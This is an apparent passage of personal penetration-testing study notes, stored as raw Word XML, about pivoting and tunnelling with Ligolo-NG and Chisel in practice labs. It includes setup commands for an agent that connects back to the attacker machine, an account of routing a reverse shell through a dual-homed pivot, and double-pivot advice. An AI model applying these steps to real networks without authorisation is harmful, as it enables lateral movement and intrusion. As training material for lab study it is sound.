    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000697">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1236"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">For example in the </w:t>
      </w:r>
      <w:hyperlink r:id="rId167">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">BBSCute</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> PG Play, where we learned to do this, they created the directory /exploit/unix/webapp/ since that is where their module belonged in Metasploit</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000698">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1236"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And then once they opened metasploit, that is where they found it</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000699">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000006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9B">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_jh27emg69e23" w:id="54"/>
      <w:bookmarkEnd w:id="54"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Building intuition for knowing when to use tunneling/pivots</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000069C">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000069D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1221"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If you get this message "Host '192.168.45.244' is not allowed to connect to this service" message, then you likely have to access it via a pivot/tunnel</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000069E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1221"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If there's a port only open to local host that's unusual, then it might be running a service that's only accessible through port forwarding</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000069F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1221"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">So look at open ports and see what is only available on 127.0.0.1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000006A0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1221"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If so, that means it's likely suspicious, so use a tunnel to get access to it from Kali, and then access service</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000006A1">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000006A2">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000006A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1210"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In the</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> XXXXXXXXX-B .148</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> machine, I got command execution within the mssql application. But, when I tried pinging my Kali using the command execution, my tcpdump didn't catch anything. This is because the .148 machine was in the 10 subnet and my kali was in the 192 subnet.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000006A4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1210"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">But my Ligolo Pivot was dual-homed and in both subnets, so I was able to set up a listener on the pivot, send the reverse shell connection from .148 to the pivot, which forwarded the connection to my Kali rlwrap, which caught the rev shell!</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000006A5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1210"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">You can see more info in the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">XXXXXXXXX-B .148 </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">writeup or in the Ligolo "Port forward from pivot to Kali" section</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000006A6">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>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A9">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_i0drml7b0et4" w:id="55"/>
      <w:bookmarkEnd w:id="55"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Ligolo-NG</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000006AA">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000006AB">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">NG stands for "Next Generation" since it's a newer version of Ligolo</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000006AC">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000006AD">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Ligolo-NG vs. Chisel:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000006AE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="972"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Ligolo allows for a seamless VPN-like experience. No need to worry about SOCKS or proxychains</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000006AF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="972"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Chisel is a lot quicker to set up, but then you have to worry about whether your tools are compatible with SOCKS and Proxychains</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000006B0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="972"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">They both are almost always available to use since they require a reverse connection and no specific ports need to be open on the pivot machine</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000006B1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="972"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Basically, try and use Ligolo if you can since it's a lot more seamless to use</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000006B2">
      <w:pPr>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t xml:space="preserve">Using NMAP in Ligolo:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000006B4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="453"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Because the agent is running without privileges, it's not possible to forward raw packets. When you perform a NMAP SYN-SCAN, a TCP connect() is performed on the agent.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000006B5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="453"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">When using nmap, you should use </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">--unprivileged</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> or </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-PE </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">to avoid false positives.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000006B6">
      <w:pPr>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pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_vmr4ia63ojri" w:id="56"/>
      <w:bookmarkEnd w:id="56"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Quick Guide:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000006B9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1250"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo ip tuntap add user kali mode tun ligolo</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000006BA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1250"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo ip link set ligolo up</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000006BB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1250"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo ip route add &lt;subnet&gt;/24 dev ligolo</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000006BC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1250"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">./proxy -selfcert -laddr 0.0.0.0:4443</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000006BD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1250"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">DON'T USE ANY PORT BELOW 1024 or else u need admin on pivot machine</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000006BE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1250"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.\agent.exe -connect 192.168.45.232:4443 -ignore-cert</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000006BF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1250"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">session</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000006C0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1250"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">start</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000006C1">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000006C2">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If you ever need to double pivot, just download agent.exe on that latest compromised machine and then connect to that session via Ligolo and now you can access that machine via Ligolo</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000006C3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="361"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Shown here (very easy) </w:t>
      </w:r>
      <w:hyperlink r:id="rId168">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://systemweakness.com/double-pivoting-for-newbies-with-ligolo-ng-4177b3f1f27b</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000006C4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="361"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Here is a MUCH more concise guide too: </w:t>
      </w:r>
      <w:hyperlink r:id="rId169">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://medium.com/@0x47M4D/double-pivoting-using-ligolo-ng-3b4094363ff2</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6C5">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000006C6">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_2ztxh7fm0v6o" w:id="57"/>
      <w:bookmarkEnd w:id="57"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Download Ligolo-NG</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000006C7">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:hyperlink r:id="rId170">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Ligolo-NG Github Release Page</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000006C8">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
